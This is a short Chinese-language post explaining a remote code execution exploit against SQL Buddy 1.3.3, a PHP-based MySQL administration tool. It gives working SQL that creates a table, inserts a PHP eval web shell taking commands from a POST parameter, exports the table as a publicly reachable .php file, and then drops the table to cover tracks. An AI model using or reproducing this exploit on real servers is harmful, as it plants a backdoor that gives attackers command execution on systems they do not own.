SqlBuddy是php编写的一款用于MySQL管理的开源工具，使用它可以很容易的编写SQL脚本。

官网是：http://sqlbuddy.com

最新版本是SQL Buddy 1.3.3 ，看起来更像是Adminer之类胜似于PHPMyAdmin

官方定义SQL Buddy为Web based MySQL administration

老外发了一下简单利用SQL Buddy 1.3.3 Remote Code Execution

1.设计可登陆远程MySQL主机

随便来个虚拟主机的mysql

CREATE TABLE `test`.`test` (`sp123` TEXT NOT NULL );

INSERT INTO `test`.`test` (`sp123` )VALUES ('<?php @eval($_POST[sp123])?>');

2.允许Export出php格式文件（可任意访问），造成命令执行

记得

DROP TABLE `test`;

当然如果你能猜到目标的密码又有写权限的话也就不用这样玩了。